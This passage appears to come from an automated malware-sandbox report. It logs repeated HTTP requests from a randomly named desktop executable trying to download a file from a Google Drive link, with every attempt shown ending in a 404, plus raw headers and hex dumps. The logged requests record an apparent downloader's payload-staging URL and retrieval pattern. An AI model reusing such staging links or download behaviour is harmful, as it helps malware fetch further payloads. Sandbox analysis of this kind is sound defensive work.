                                                                          2025-01-10 14:35:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 66 66 35 4a 70 72 48 4b 39 57 6e 71 71 64 4c 49 54 6b 4c 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Mff5JprHK9WnqqdLITkLqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.11.2049780142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:21 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:21 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:21 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-NQ1HJASmv8F8wEr1pOHDEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.11.2049781142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:22 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:22 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQXtUEJZf4C4gkDCXKnFkydjwwQWKm1nceswqeqLOCI1hznQIp0uNPXdYf66dRviP6W_e-E86A
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:22 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-X86PfESf03BrET8MPkZ54A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 51 2d 75 73 59 78 4c 31 74 36 77 36 57 4d 71 4f 57 6d 47 54 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wQ-usYxL1t6w6WMqOWmGTQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.11.2049782142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:32 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:33 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:33 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-OFdErhOOTiuARb81Ssn7SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.11.2049783142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:33 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:33 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4XBvI73cbfhFTD7NKIHyRefins8Nh-tMwIvGsVOJMNJUm46jRX1TkZlVl8aIjOUN2E_lnlG5o
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:33 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QtfbGDAh5BauZHnw-osd9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 61 36 56 4c 78 39 39 5f 46 4c 53 2d 57 6d 31 62 49 6e 79 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ma6VLx99_FLS-Wm1bInyGA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.11.2049784142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:44 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:44 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:44 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-2H5MY1Yl1l0rL9pR86BEOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.11.2049785142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:44 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:45 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgSJS6KD6gxCzrqqBeRy24CousGyYUM_mZdjcRvC4T79YGmFUkvXV5do_CUI5_pjniO7uZ7cyG4
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:44 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-0PzhdXXu0uPuUoB_l9032w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 59 6c 4f 50 63 6d 47 51 37 38 5f 57 50 42 58 41 54 45 48 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wYlOPcmGQ78_WPBXATEHoA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.11.2049786142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:55 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:55 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:55 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-_5JcRp9BKMoIVYVHTesxuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.11.2049787142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:55 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:56 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7MGSCM-SqO8QIqqKWY3qJxCkHxZcO5bdMP9oMniQH9Cu54DdZ51K_0TXxSih3FWwrqHwnqwTg
                                                                          Content-Type: text/html; charset=utf-8
